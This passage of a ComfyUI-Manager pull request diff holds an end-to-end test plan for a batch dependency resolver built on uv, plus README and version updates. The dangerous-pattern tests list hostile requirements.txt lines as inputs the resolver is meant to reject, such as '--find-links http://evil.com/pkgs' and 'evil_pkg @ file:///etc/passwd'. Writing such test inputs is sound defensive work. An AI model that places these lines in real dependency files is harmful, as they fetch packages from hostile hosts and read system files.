- **cm_global integration (startup path only)**: At startup (`prestartup_script.py`), `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` are passed as empty defaults to the resolver. Integration with cm_global at startup is deferred to a future commit. Do not file defects for blacklist/override/downgrade behavior in startup unified mode. Note: `cm_cli uv-compile` and `cm_cli install --uv-compile` already pass real `cm_global` values (see PRD Future Extensions).
- **cm_cli per-node install (without --uv-compile)**: `cm_cli install` without `--uv-compile` imports from `legacy/manager_core.py` and uses per-node pip install. This is by design — use `cm_cli install --uv-compile` or `cm_cli uv-compile` for batch resolution.
- **Standalone `execute_install_script()`** (`glob/manager_core.py` ~line 1881): Has a unified resolver guard (`manager_util.use_unified_resolver`), identical to the class method guard. Reachable from the glob API via `update-comfyui` tasks (`update_path()` / `update_to_stable_comfyui()`), git-based node pack updates (`git_repo_update_check_with()` / `fetch_or_pull_git_repo()`), and gitclone operations. Also called from CLI and legacy server paths. The guard behaves identically to the class method at all call sites; testing it separately adds no coverage beyond TC-14 Path 1.
## CLI E2E Tests (`cm_cli uv-compile`)
These tests do **not** require ComfyUI server. Only a venv with `COMFYUI_PATH` set and
the E2E environment from `setup_e2e_env.sh` are needed.
**Common setup**:
```bash
source tests/e2e/scripts/setup_e2e_env.sh # → E2E_ROOT=...
export COMFYUI_PATH="$E2E_ROOT/comfyui"
VENV_PY="$E2E_ROOT/venv/bin/python"
```
---
### TC-CLI-1: Normal Batch Resolution [P0]
**Steps**:
1. Create a test node pack with a simple dependency:
```bash
mkdir -p "$COMFYUI_PATH/custom_nodes/test_cli_pack"
echo "chardet>=5.0" > "$COMFYUI_PATH/custom_nodes/test_cli_pack/requirements.txt"
```
2. Run:
```bash
$VENV_PY -m cm_cli uv-compile
```
**Verify**:
- Exit code: 0
- Output contains: `Resolved N deps from M source(s)`
- `chardet` is importable: `$VENV_PY -c "import chardet"`
**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/test_cli_pack"`
---
### TC-CLI-2: No Custom Node Packs [P1]
**Steps**:
1. Ensure `custom_nodes/` contains no node packs (only symlinks like `ComfyUI-Manager`
or empty dirs may remain)
2. Run:
```bash
$VENV_PY -m cm_cli uv-compile
```
**Verify**:
- Exit code: 0
- Output contains: `No custom node packs found` OR `Resolution complete (no deps needed)`
---
### TC-CLI-3: uv Unavailable [P0]
**Steps**:
1. Create a temporary venv **without** uv:
```bash
python3 -m venv /tmp/no_uv_venv
/tmp/no_uv_venv/bin/pip install comfyui-manager # or install from local
```
2. Ensure no standalone `uv` in PATH:
```bash
PATH="/tmp/no_uv_venv/bin" COMFYUI_PATH="$COMFYUI_PATH" \
/tmp/no_uv_venv/bin/python -m cm_cli uv-compile
```
**Verify**:
- Exit code: 1
- Output contains: `uv is not available`
**Cleanup**: `rm -rf /tmp/no_uv_venv`
---
### TC-CLI-4: Conflicting Dependencies [P0]
**Steps**:
1. Create two node packs with conflicting pinned versions:
```bash
mkdir -p "$COMFYUI_PATH/custom_nodes/conflict_a"
echo "numpy==1.24.0" > "$COMFYUI_PATH/custom_nodes/conflict_a/requirements.txt"
mkdir -p "$COMFYUI_PATH/custom_nodes/conflict_b"
echo "numpy==1.26.0" > "$COMFYUI_PATH/custom_nodes/conflict_b/requirements.txt"
```
2. Run:
```bash
$VENV_PY -m cm_cli uv-compile
```
**Verify**:
- Exit code: 1
- Output contains: `Resolution failed`
**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/conflict_a" "$COMFYUI_PATH/custom_nodes/conflict_b"`
---
### TC-CLI-5: Dangerous Pattern Skip [P0]
**Steps**:
1. Create a node pack mixing valid and dangerous lines:
```bash
mkdir -p "$COMFYUI_PATH/custom_nodes/test_dangerous"
cat > "$COMFYUI_PATH/custom_nodes/test_dangerous/requirements.txt" << 'EOF'
chardet>=5.0
-r ../../../etc/hosts
--find-links http://evil.com/pkgs
requests>=2.28
EOF
```
2. Run:
```bash
$VENV_PY -m cm_cli uv-compile
```
**Verify**:
- Exit code: 0
- Output contains: `Resolved 2 deps` (chardet + requests, dangerous lines skipped)
- `chardet` and `requests` are importable
- Log contains: `rejected dangerous line` for the `-r` and `--find-links` lines
**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/test_dangerous"`
---
### TC-CLI-6: install --uv-compile Single Pack [P0]
**Steps**:
1. In clean E2E environment, install a single node pack:
```bash
$VENV_PY -m cm_cli install comfyui-impact-pack --uv-compile --mode remote
```
**Verify**:
- Exit code: 0
- Per-node pip install does NOT run (no `Install: pip packages` in output)
- `install.py` still executes
- Output contains: `Resolved N deps from M source(s)`
- Impact Pack dependencies are importable: `cv2`, `skimage`, `dill`, `scipy`, `matplotlib`
---
### TC-CLI-7: install --uv-compile Multiple Packs [P0]
**Steps**:
1. After TC-CLI-6 (or with impact-pack already installed), install two more packs at once:
```bash
$VENV_PY -m cm_cli install comfyui-impact-subpack comfyui-inspire-pack --uv-compile --mode remote
```
**Verify**:
- Exit code: 0
- Both packs installed: `[INSTALLED] comfyui-impact-subpack`, `[INSTALLED] comfyui-inspire-pack`
- Batch resolution runs once (not twice) after all installs complete
- Resolves deps for **all** installed packs (impact + subpack + inspire + manager)
- New dependencies importable: `cachetools`, `webcolors`, `piexif`
- Previously installed deps (from step 1) remain intact
---
## Test Fixture Setup
Each TC that requires node packs should use isolated, deterministic fixtures:
```bash
# Create test node pack
mkdir -p "$COMFY_ROOT/custom_nodes/test_pack_a"
echo "chardet>=5.0" > "$COMFY_ROOT/custom_nodes/test_pack_a/requirements.txt"
# Cleanup after test
rm -rf "$COMFY_ROOT/custom_nodes/test_pack_a"
```
Ensure no other node packs in `custom_nodes/` interfere with expected counts. Use a clean `custom_nodes/` directory or account for existing packs in assertions.
---
## TC-1: Normal Batch Resolution [P0]
**Precondition**: `use_unified_resolver = true`, uv installed, at least one node pack with `requirements.txt`
**Steps**:
1. Create `$COMFY_ROOT/custom_nodes/test_pack_a/requirements.txt` with content: `chardet>=5.0`
2. Start ComfyUI
**Expected log**:
```
[UnifiedDepResolver] Collected N deps from M sources (skipped 0)
[UnifiedDepResolver] running: ... uv pip compile ...
[UnifiedDepResolver] running: ... uv pip install ...
[UnifiedDepResolver] startup batch resolution succeeded
```
**Verify**: Neither `Install: pip packages for` nor `Install: pip packages` appears in output (both per-node pip variants must be absent)
---
## TC-2: Disabled State (Default) [P1]
**Precondition**: `use_unified_resolver = false` or key absent from config.ini
**Steps**: Start ComfyUI
**Verify**: No `[UnifiedDepResolver]` log output at all
---
## TC-3: Fallback When uv Unavailable [P0]
**Precondition**: `use_unified_resolver = true`, uv completely unavailable
**Steps**:
1. Create a venv **without** uv installed (`uv` package not in venv)
2. Ensure no standalone `uv` binary exists in `$PATH` (rename or use isolated `$PATH`)
3. Start ComfyUI
```bash
# Reliable uv removal: both module and binary must be absent
uv pip uninstall uv
# Verify neither path works
python -m uv --version 2>&1 | grep -q "No module" && echo "module uv: absent"
which uv 2>&1 | grep -q "not found" && echo "binary uv: absent"
```
**Expected log**:
```
[UnifiedDepResolver] uv not available at startup, falling back to per-node pip
```
**Verify**:
- `manager_util.use_unified_resolver` is reset to `False`
- Subsequent node pack installations use per-node pip install normally
---
## TC-4: Fallback on Compile Failure [P0]
**Precondition**: `use_unified_resolver = true`, conflicting dependencies
**Steps**:
1. Node pack A `requirements.txt`: `numpy==1.24.0`
2. Node pack B `requirements.txt`: `numpy==1.26.0`
3. Start ComfyUI
**Expected log**:
```
[UnifiedDepResolver] startup batch failed: compile failed: ..., falling back to per-node pip
```
**Verify**:
- `manager_util.use_unified_resolver` is reset to `False`
- Falls back to per-node pip install normally
---
## TC-5: Fallback on Install Failure [P0]
**Precondition**: `use_unified_resolver = true`, compile succeeds but install fails
**Steps**:
1. Create node pack with `requirements.txt`: `numpy<2`
2. Force install failure by making the venv's `site-packages` read-only:
```bash
chmod -R a-w "$(python -c 'import site; print(site.getsitepackages()[0])')"
```
3. Start ComfyUI
4. After test, restore permissions:
```bash
chmod -R u+w "$(python -c 'import site; print(site.getsitepackages()[0])')"
```
**Expected log**:
```
[UnifiedDepResolver] startup batch failed: ..., falling back to per-node pip
```
> The `...` contains raw stderr from `uv pip install` (e.g., permission denied errors).
**Verify**:
- `manager_util.use_unified_resolver` is reset to `False`
- Falls back to per-node pip install
---
## TC-6: install.py Execution Preserved [P0]
**Precondition**: `use_unified_resolver = true`, ComfyUI running with batch resolution succeeded
**Steps**:
1. While ComfyUI is running, install a node pack that has both `install.py` and `requirements.txt` via API:
```bash
curl -X POST http://localhost:8199/v2/manager/queue/task \
-H "Content-Type: application/json" \
-d '{
"ui_id": "test-installpy",
"client_id": "test-client",
"kind": "install",
"params": {
"id": "<node-pack-id-with-install-py>",
"version": "latest",
"selected_version": "latest",
"mode": "remote",
"channel": "default"
}
}'
```
> Choose a CNR node pack known to have both `install.py` and `requirements.txt`.
> Alternatively, use the Manager UI to install the same pack.
2. Check logs after installation
**Verify**:
- `Install: install script` is printed (install.py runs immediately during install)
- `Install: pip packages` does NOT appear (deps deferred, not installed per-node)
- Log: `[UnifiedDepResolver] deps deferred to startup batch resolution for <path>`
- After **restart**, the new pack's deps are included in batch resolution (`Collected N deps from M sources`)
---
## TC-7: Dangerous Pattern Rejection [P0]
**Precondition**: `use_unified_resolver = true`
**Steps**: Include any of the following in a node pack's `requirements.txt`:
```
-r ../../../etc/hosts
--requirement secret.txt
-e git+https://evil.com/repo
--editable ./local
-c constraint.txt
--constraint external.txt
--find-links http://evil.com/pkgs
-f http://evil.com/pkgs
evil_pkg @ file:///etc/passwd
```
**Expected log**:
```
[UnifiedDepResolver] rejected dangerous line: '...' from <path>
```
**Verify**: Dangerous lines are skipped; remaining valid deps are installed normally
---
## TC-8: Path Separator Rejection [P0]
**Precondition**: `use_unified_resolver = true`
**Steps**: Node pack `requirements.txt`:
```
../evil/pkg
bad\pkg
./local_package
```
**Expected log**:
```
[UnifiedDepResolver] rejected path separator: '...' from <path>
```
**Verify**: Lines with `/` or `\` in the package name portion are rejected; valid deps on other lines are processed normally
---
## TC-9: --index-url / --extra-index-url Separation [P0]
**Precondition**: `use_unified_resolver = true`
Test all four inline forms:
| # | `requirements.txt` content | Expected package | Expected URL |
|---|---------------------------|-----------------|--------------|
| a | `torch --index-url https://example.com/whl` | `torch` | `https://example.com/whl` |
| b | `torch --extra-index-url https://example.com/whl` | `torch` | `https://example.com/whl` |
| c | `--index-url https://example.com/whl` (standalone) | *(none)* | `https://example.com/whl` |
| d | `--extra-index-url https://example.com/whl` (standalone) | *(none)* | `https://example.com/whl` |
**Steps**: Create a node pack with each variant (one at a time or combined with a valid package on a separate line)
**Verify**:
- Package spec is correctly extracted (or empty for standalone lines)
- URL is passed as `--extra-index-url` to `uv pip compile`
- Duplicate URLs across multiple node packs are deduplicated
- Log: `[UnifiedDepResolver] extra-index-url: <url>`
---
## TC-10: Credential Redaction [P0]
**Precondition**: `use_unified_resolver = true`
**Steps**: Node pack `requirements.txt`:
```
private-pkg --index-url https://user:token123@pypi.private.com/simple
```
**Verify**:
- `user:token123` does NOT appear in logs
- Masked as `****@` in log output
---
## TC-11: Disabled Node Packs Excluded [P1]
**Precondition**: `use_unified_resolver = true`
**Steps**: Test both disabled styles:
1. New style: `custom_nodes/.disabled/test_pack/requirements.txt` with content: `numpy`
2. Old style: `custom_nodes/test_pack.disabled/requirements.txt` with content: `requests`
3. Start ComfyUI
**Verify**: Neither disabled node pack's deps are collected (not included in `Collected N`)
---
## TC-12: No Dependencies [P2]
**Precondition**: `use_unified_resolver = true`, only node packs without `requirements.txt`
**Steps**: Start ComfyUI
**Expected log**:
```
[UnifiedDepResolver] No dependencies to resolve
```
**Verify**: Compile/install steps are skipped; startup completes normally
---
## TC-13: Runtime Node Pack Install (Defer Behavior) [P1]
**Precondition**: `use_unified_resolver = true`, batch resolution succeeded at startup
**Steps**:
1. Start ComfyUI and confirm batch resolution succeeds
2. While ComfyUI is running, install a new node pack via API:
```bash
curl -X POST http://localhost:8199/v2/manager/queue/task \
-H "Content-Type: application/json" \
-d '{
"ui_id": "test-defer-1",
"client_id": "test-client",
"kind": "install",
"params": {
"id": "<node-pack-id>",
"version": "latest",
"selected_version": "latest",
"mode": "remote",
"channel": "default"
}
}'
```
> Replace `<node-pack-id>` with a real CNR node pack ID (e.g., from the Manager UI).
> Alternatively, use the Manager UI to install a node pack.
3. Check logs after installation
**Verify**:
- Log: `[UnifiedDepResolver] deps deferred to startup batch resolution for <path>`
- `Install: pip packages` does NOT appear
- After ComfyUI **restart**, the new node pack's deps are included in batch resolution
---
## TC-14: Both Unified Resolver Code Paths [P0]
Verify both code locations that guard per-node pip install behave correctly in unified mode:
| Path | Guard Variable | Trigger | Location |
|------|---------------|---------|----------|
| Runtime install | `manager_util.use_unified_resolver` | API install while ComfyUI is running | `glob/manager_core.py` class method (~line 846) |
| Startup lazy install | `_unified_resolver_succeeded` | Queued install processed at restart | `prestartup_script.py` `execute_lazy_install_script()` (~line 594) |
> **Note**: The standalone `execute_install_script()` in `glob/manager_core.py` (~line 1881) also has a unified resolver guard but is reachable via `update-comfyui`, git-based node pack updates, gitclone operations, CLI, and legacy server paths. The guard is identical to the class method; see [Out of Scope](#out-of-scope-deferred).
**Steps**:
**Path 1 — Runtime API install (class method)**:
```bash
# While ComfyUI is running:
curl -X POST http://localhost:8199/v2/manager/queue/task \
-H "Content-Type: application/json" \
-d '{
"ui_id": "test-path1",
"client_id": "test-client",
"kind": "install",
"params": {
"id": "<node-pack-id>",
"version": "latest",
"selected_version": "latest",
"mode": "remote",
"channel": "default"
}
}'
```
> Choose a CNR node pack that has both `install.py` and `requirements.txt`.
**Path 2 — Startup lazy install (`execute_lazy_install_script`)**:
1. Create a test node pack with both `install.py` and `requirements.txt`:
```bash
mkdir -p "$COMFY_ROOT/custom_nodes/test_pack_lazy"
echo 'print("lazy install.py executed")' > "$COMFY_ROOT/custom_nodes/test_pack_lazy/install.py"
echo "chardet" > "$COMFY_ROOT/custom_nodes/test_pack_lazy/requirements.txt"
```
2. Manually inject a `#LAZY-INSTALL-SCRIPT` entry into `install-scripts.txt`:
```bash
SCRIPTS_DIR="$COMFY_ROOT/user/__manager/startup-scripts"
mkdir -p "$SCRIPTS_DIR"
PYTHON_PATH=$(which python)
echo "['$COMFY_ROOT/custom_nodes/test_pack_lazy', '#LAZY-INSTALL-SCRIPT', '$PYTHON_PATH']" \
>> "$SCRIPTS_DIR/install-scripts.txt"
```
3. Start ComfyUI (with `use_unified_resolver = true`)
**Verify**:
- Path 1: `[UnifiedDepResolver] deps deferred to startup batch resolution for <path>` appears, `install.py` runs immediately, `Install: pip packages` does NOT appear
- Path 2: `lazy install.py executed` is printed (install.py runs at startup), `Install: pip packages for` does NOT appear for the pack (skipped because `_unified_resolver_succeeded` is True after batch resolution)
---
## TC-15: Behavior After Fallback in Same Process [P1]
**Precondition**: Resolver failed at startup (TC-4 or TC-5 scenario)
**Steps**:
1. Set up conflicting deps (as in TC-4) and start ComfyUI (resolver fails, flag reset to `False`)
2. While still running, install a new node pack via API:
```bash
curl -X POST http://localhost:8199/v2/manager/queue/task \
-H "Content-Type: application/json" \
-d '{
"ui_id": "test-postfallback",
"client_id": "test-client",
"kind": "install",
"params": {
"id": "<node-pack-id>",
"version": "latest",
"selected_version": "latest",
"mode": "remote",
"channel": "default"
}
}'
```
**Verify**:
- New node pack uses per-node pip install (not deferred)
- `Install: pip packages` appears normally
- On next restart with conflicts resolved, unified resolver retries if config still `true`
---
## TC-16: Generic Exception Fallback [P1]
**Precondition**: `use_unified_resolver = true`, an exception escapes before `resolve_and_install()`
This covers the `except Exception` handler at `prestartup_script.py` (~line 793), distinct from `UvNotAvailableError` (TC-3) and `ResolveResult` failure (TC-4/TC-5). The generic handler catches errors in the import, `collect_node_pack_paths()`, `collect_base_requirements()`, or `UnifiedDepResolver.__init__()` — all of which run before the resolver's own internal error handling.
**Steps**:
1. Make the `custom_nodes` directory unreadable so `collect_node_pack_paths()` raises a `PermissionError`:
```bash
chmod a-r "$COMFY_ROOT/custom_nodes"
```
2. Start ComfyUI
3. After test, restore permissions:
```bash
chmod u+r "$COMFY_ROOT/custom_nodes"
```
**Expected log**:
```
[UnifiedDepResolver] startup error: ..., falling back to per-node pip
```
**Verify**:
- `manager_util.use_unified_resolver` is reset to `False`
- Falls back to per-node pip install normally
- Log pattern is `startup error:` (NOT `startup batch failed:` nor `uv not available`)
---
## TC-17: Restart Dependency Detection [P0]
**Precondition**: `use_unified_resolver = true`, automated E2E scripts available
This test verifies that the resolver correctly detects and installs dependencies for node packs added between restarts, incrementally building the dependency set.
**Steps**:
1. Boot ComfyUI with no custom node packs (Boot 1 — baseline)
2. Verify baseline deps only (Manager's own deps)
3. Stop ComfyUI
4. Clone `ComfyUI-Impact-Pack` into `custom_nodes/`
5. Restart ComfyUI (Boot 2)
6. Verify Impact Pack deps are installed (`cv2`, `skimage`, `dill`, `scipy`, `matplotlib`)
7. Stop ComfyUI
8. Clone `ComfyUI-Inspire-Pack` into `custom_nodes/`
9. Restart ComfyUI (Boot 3)
10. Verify Inspire Pack deps are installed (`cachetools`, `webcolors`)
**Expected log (each boot)**:
```
[UnifiedDepResolver] Collected N deps from M sources (skipped S)
[UnifiedDepResolver] running: ... uv pip compile ...
[UnifiedDepResolver] running: ... uv pip install ...
[UnifiedDepResolver] startup batch resolution succeeded
```
**Verify**:
- Boot 1: ~10 deps from ~10 sources; `cv2`, `dill`, `cachetools` are NOT installed
- Boot 2: ~19 deps from ~18 sources; `cv2`, `skimage`, `dill`, `scipy`, `matplotlib` all importable
- Boot 3: ~24 deps from ~21 sources; `cachetools`, `webcolors` also importable
- Both packs show as loaded in logs
**Automation**: Use `tests/e2e/scripts/` (setup → start → stop) with node pack cloning between boots.
---
## TC-18: Real Node Pack Integration [P0]
**Precondition**: `use_unified_resolver = true`, network access to GitHub + PyPI
Full pipeline test with real-world node packs (`ComfyUI-Impact-Pack` + `ComfyUI-Inspire-Pack`) to verify the resolver handles production requirements.txt files correctly.
**Steps**:
1. Set up E2E environment
2. Clone both Impact Pack and Inspire Pack into `custom_nodes/`
3. Direct-mode: instantiate `UnifiedDepResolver`, call `collect_requirements()` and `resolve_and_install()`
4. Boot-mode: start ComfyUI and verify via logs
**Expected behavior (direct mode)**:
```
--- Discovered node packs (3) --- # Manager, Impact, Inspire
ComfyUI-Impact-Pack
ComfyUI-Inspire-Pack
ComfyUI-Manager
--- Phase 1: Collect Requirements ---
Total requirements: ~24
Skipped: 1 # SAM2 git+https:// URL
Extra index URLs: set()
```
**Verify**:
- `git+https://github.com/facebookresearch/sam2.git` is correctly rejected with "rejected path separator"
- All other dependencies are collected and resolved
- After install, `cv2`, `PIL`, `scipy`, `skimage`, `matplotlib` are all importable
- No conflicting version errors during compile
**Automation**: Use `tests/e2e/scripts/` (setup → clone packs → start) with direct-mode resolver invocation.
---
## Validated Behaviors (from E2E Testing)
The following behaviors were confirmed during manual E2E testing:
### Resolver Pipeline
- **3-phase pipeline**: Collect → `uv pip compile` → `uv pip install` works end-to-end
- **Incremental detection**: Resolver discovers new node packs on each restart without reinstalling existing deps
- **Dependency deduplication**: Overlapping deps from multiple packs are resolved to compatible versions
### Security & Filtering
- **`git+https://` rejection**: URLs like `git+https://github.com/facebookresearch/sam2.git` are rejected with "rejected path separator" — SAM2 is the only dependency skipped from Impact Pack
- **Blacklist filtering**: `PackageRequirement` objects have `.name`, `.spec`, `.source` attributes; `collected.skipped` returns `[(spec_string, reason_string)]` tuples
### Manager Integration
- **Manager v4 endpoints**: All endpoints use `/v2/` prefix (e.g., `/v2/manager/queue/status`)
- **`Blocked by policy`**: Expected when Manager is pip-installed and also symlinked in `custom_nodes/`; prevents legacy double-loading
- **config.ini path**: Must be at `$COMFY_ROOT/user/__manager/config.ini`, not in the symlinked Manager dir
### Environment
- **PYTHONPATH requirement**: `comfy` is a local package (not pip-installed); `comfyui_manager` imports from `comfy`, so both require `PYTHONPATH=$COMFY_ROOT`
- **HOME isolation**: `HOME=$E2E_ROOT/home` prevents host config contamination during boot
---
## Summary
| TC | P | Scenario | Key Verification |
|----|---|----------|------------------|
| 1 | P0 | Normal batch resolution | compile → install pipeline |
| 2 | P1 | Disabled state | No impact on existing behavior |
| 3 | P0 | uv unavailable fallback | Flag reset + per-node resume |
| 4 | P0 | Compile failure fallback | Flag reset + per-node resume |
| 5 | P0 | Install failure fallback | Flag reset + per-node resume |
| 6 | P0 | install.py preserved | deps defer, install.py immediate |
| 7 | P0 | Dangerous pattern rejection | Security filtering |
| 8 | P0 | Path separator rejection | `/` and `\` in package names |
| 9 | P0 | index-url separation | All 4 variants + dedup |
| 10 | P0 | Credential redaction | Log security |
| 11 | P1 | Disabled packs excluded | Both `.disabled/` and `.disabled` suffix |
| 12 | P2 | No dependencies | Empty pipeline |
| 13 | P1 | Runtime install defer | Defer until restart |
| 14 | P0 | Both unified resolver paths | runtime API (class method) + startup lazy install |
| 15 | P1 | Post-fallback behavior | Per-node pip resumes in same process |
| 16 | P1 | Generic exception fallback | Distinct from uv-absent and batch-failed |
| 17 | P0 | Restart dependency detection | Incremental node pack discovery across restarts |
| 18 | P0 | Real node pack integration | Impact + Inspire Pack full pipeline |
| CLI-1 | P0 | CLI normal batch resolution | exit 0, deps installed |
| CLI-2 | P1 | CLI no custom nodes | exit 0, graceful empty |
| CLI-3 | P0 | CLI uv unavailable | exit 1, error message |
| CLI-4 | P0 | CLI conflicting deps | exit 1, resolution failed |
| CLI-5 | P0 | CLI dangerous pattern skip | exit 0, dangerous skipped |
| CLI-6 | P0 | install --uv-compile single | per-node pip skipped, batch resolve |
| CLI-7 | P0 | install --uv-compile multi | batch once after all installs |
### Traceability
| Feature Requirement | Test Cases |
|---------------------|------------|
| FR-1: Dependency collection | TC-1, TC-11, TC-12 |
| FR-2: Input sanitization | TC-7, TC-8, TC-10 |
| FR-3: Index URL handling | TC-9 |
| FR-4: Batch resolution (compile) | TC-1, TC-4 |
| FR-5: Batch install | TC-1, TC-5 |
| FR-6: install.py preserved | TC-6, TC-14 |
| FR-7: Startup batch integration | TC-1, TC-2, TC-3 |
| Fallback behavior | TC-3, TC-4, TC-5, TC-15, TC-16 |
| Disabled node pack exclusion | TC-11 |
| Runtime defer behavior | TC-13, TC-14 |
| FR-8: Restart discovery | TC-17 |
| FR-9: Real-world compatibility | TC-17, TC-18 |
| FR-2: Input sanitization (git URLs) | TC-8, TC-18 |
| FR-10: CLI batch resolution | TC-CLI-1, TC-CLI-2, TC-CLI-3, TC-CLI-4, TC-CLI-5 |
| FR-11: CLI install --uv-compile | TC-CLI-6, TC-CLI-7 |

View File

@ -11,11 +11,15 @@ cm-cli [OPTIONS]
OPTIONS:
[install|reinstall|uninstall|update|disable|enable|fix] node_name ... ?[--channel <channel name>] ?[--mode [remote|local|cache]]
[install|reinstall|update|fix] node_name ... ?[--uv-compile]
[update|disable|enable|fix] all ?[--channel <channel name>] ?[--mode [remote|local|cache]]
[update|fix] all ?[--uv-compile]
[simple-show|show] [installed|enabled|not-installed|disabled|all|snapshot|snapshot-list] ?[--channel <channel name>] ?[--mode [remote|local|cache]]
save-snapshot ?[--output <snapshot .json/.yaml>]
restore-snapshot <snapshot .json/.yaml> ?[--pip-non-url] ?[--pip-non-local-url] ?[--pip-local-url]
restore-dependencies
restore-snapshot <snapshot .json/.yaml> ?[--pip-non-url] ?[--pip-non-local-url] ?[--pip-local-url] ?[--uv-compile]
restore-dependencies ?[--uv-compile]
install-deps <deps.json> ?[--channel <channel name>] ?[--mode [remote|local|cache]] ?[--uv-compile]
uv-compile
clear
```
@ -107,6 +111,22 @@ ComfyUI-Loopchain
* `enable`: Enables the specified custom nodes.
* `fix`: Attempts to fix dependencies for the specified custom nodes.
#### `--uv-compile` flag (`install`, `reinstall`, `update`, `fix`)
When `--uv-compile` is specified, per-node pip installs are skipped during node operations.
After all operations complete, `uv pip compile` resolves the full dependency graph in one batch.
* Requires `uv` to be installed.
* Prevents dependency conflicts between multiple node packs.
* On resolution failure, displays conflicting packages and which node packs requested them.
* `--uv-compile` is mutually exclusive with `--no-deps` (applies to both `install` and `reinstall`).
```bash
cm-cli install ComfyUI-Impact-Pack ComfyUI-Inspire-Pack --uv-compile
cm-cli update all --uv-compile
cm-cli fix ComfyUI-Impact-Pack --uv-compile
```
### 4. Snapshot Management
* `cm-cli save-snapshot [--output <snapshot .json/.yaml>]`: Saves the current snapshot.
@ -122,12 +142,33 @@ ComfyUI-Loopchain
### 5. Dependency Restoration
`restore-dependencies`
`restore-dependencies ?[--uv-compile]`
* This command can be used if custom nodes are installed under the `ComfyUI/custom_nodes` path but their dependencies are not installed.
* It is useful when starting a new cloud instance, like Colab, where dependencies need to be reinstalled and installation scripts re-executed.
* It can also be utilized if ComfyUI is reinstalled and only the custom_nodes path has been backed up and restored.
* Use `--uv-compile` to skip per-node pip installs and resolve all dependencies in one batch instead.
### 6. Clear
### 6. Install from Dependency File
`install-deps <deps.json> ?[--channel <channel name>] ?[--mode [remote|local|cache]] ?[--uv-compile]`
* Installs custom nodes specified in a dependency spec file (`.json`) or workflow file (`.png`/`.json`).
* Use `--uv-compile` to batch-resolve all dependencies after installation instead of per-node pip.
### 7. uv-compile
`uv-compile ?[--user-directory <path>]`
* Batch-resolves and installs all custom node pack dependencies using `uv pip compile`.
* Useful for environment recovery or initial setup without starting ComfyUI.
* Requires `uv` to be installed.
```bash
cm-cli uv-compile
cm-cli uv-compile --user-directory /path/to/comfyui
```
### 8. Clear
In the GUI, installations, updates, or snapshot restorations are scheduled to execute the next time ComfyUI is launched. The `clear` command clears this scheduled state, ensuring no pre-execution actions are applied.

View File

@ -11,11 +11,15 @@ cm-cli [OPTIONS]
OPTIONS:
[install|reinstall|uninstall|update|disable|enable|fix] node_name ... ?[--channel <channel name>] ?[--mode [remote|local|cache]]
[install|reinstall|update|fix] node_name ... ?[--uv-compile]
[update|disable|enable|fix] all ?[--channel <channel name>] ?[--mode [remote|local|cache]]
[update|fix] all ?[--uv-compile]
[simple-show|show] [installed|enabled|not-installed|disabled|all|snapshot|snapshot-list] ?[--channel <channel name>] ?[--mode [remote|local|cache]]
save-snapshot ?[--output <snapshot .json/.yaml>]
restore-snapshot <snapshot .json/.yaml> ?[--pip-non-url] ?[--pip-non-local-url] ?[--pip-local-url]
restore-dependencies
restore-snapshot <snapshot .json/.yaml> ?[--pip-non-url] ?[--pip-non-local-url] ?[--pip-local-url] ?[--uv-compile]
restore-dependencies ?[--uv-compile]
install-deps <deps.json> ?[--channel <channel name>] ?[--mode [remote|local|cache]] ?[--uv-compile]
uv-compile
clear
```
@ -108,6 +112,21 @@ ComfyUI-Loopchain
* `enable`: 지정된 커스텀 노드들을 활성화합니다.
* `fix`: 지정된 커스텀 노드의 의존성을 고치기 위한 시도를 합니다.
#### `--uv-compile` 플래그 (`install`, `reinstall`, `update`, `fix`)
`--uv-compile` 플래그를 사용하면 노드별 pip 설치를 건너뛰고, 모든 작업이 완료된 후 `uv pip compile`로 전체 의존성을 한 번에 일괄 해결합니다.
* `uv`가 설치된 환경에서만 동작합니다.
* 여러 노드 팩 간의 의존성 충돌을 방지합니다.
* 해결 실패 시 충돌 패키지와 해당 패키지를 요청한 노드 팩 목록을 표시합니다.
* `--uv-compile` 옵션은 `--no-deps`와 동시에 사용할 수 없습니다 (`install`, `reinstall` 모두 해당).
```bash
cm-cli install ComfyUI-Impact-Pack ComfyUI-Inspire-Pack --uv-compile
cm-cli update all --uv-compile
cm-cli fix ComfyUI-Impact-Pack --uv-compile
```
### 4. 스냅샷 관리 기능
* `cm-cli save-snapshot ?[--output <snapshot .json/.yaml>]`: 현재의 snapshot을 저장합니다.
@ -123,13 +142,33 @@ ComfyUI-Loopchain
### 5. 의존성 설치
`restore-dependencies`
`restore-dependencies ?[--uv-compile]`
* `ComfyUI/custom_nodes` 하위 경로에 커스텀 노드들이 설치되어 있긴 하지만, 의존성이 설치되지 않은 경우 사용할 수 있습니다.
* Colab과 같이 cloud instance를 새로 시작하는 경우 의존성 재설치 및 설치 스크립트가 재실행되어야 하는 경우 사용합니다.
* ComfyUI를 재설치할 경우, custom_nodes 경로만 백업했다가 재설치할 경우 활용 가능합니다.
* `--uv-compile` 플래그를 사용하면 노드별 pip 설치를 건너뛰고 일괄 해결합니다.
### 6. 의존성 파일로 설치
### 6. clear
`install-deps <deps.json> ?[--channel <channel name>] ?[--mode [remote|local|cache]] ?[--uv-compile]`
* 의존성 spec 파일(`.json`) 또는 워크플로우 파일(`.png`/`.json`)에 명시된 커스텀 노드를 설치합니다.
* `--uv-compile` 플래그를 사용하면 모든 노드 설치 후 일괄 의존성 해결을 수행합니다.
### 7. uv-compile
`uv-compile ?[--user-directory <path>]`
* 설치된 모든 커스텀 노드 팩의 의존성을 `uv pip compile`로 일괄 해결하고 설치합니다.
* ComfyUI를 재시작하지 않고 의존성 환경을 복구하거나 초기 설정 시 활용할 수 있습니다.
* `uv`가 설치된 환경에서만 동작합니다.
```bash
cm-cli uv-compile
cm-cli uv-compile --user-directory /path/to/comfyui
```
### 8. clear
GUI에서 install, update를 하거나 snapshot을 restore하는 경우 예약을 통해서 다음번 ComfyUI를 실행할 경우 실행되는 구조입니다. `clear` 는 이런 예약 상태를 clear해서, 아무런 사전 실행이 적용되지 않도록 합니다.

View File

@ -5,7 +5,7 @@ build-backend = "setuptools.build_meta"
[project]
name = "comfyui-manager"
license = { text = "GPL-3.0-only" }
version = "4.1b1"
version = "4.1b3"
requires-python = ">= 3.9"
description = "ComfyUI-Manager provides features to install and manage custom nodes for ComfyUI, as well as various functionalities to assist with ComfyUI."
readme = "README.md"

View File

@ -0,0 +1,241 @@
#!/usr/bin/env bash
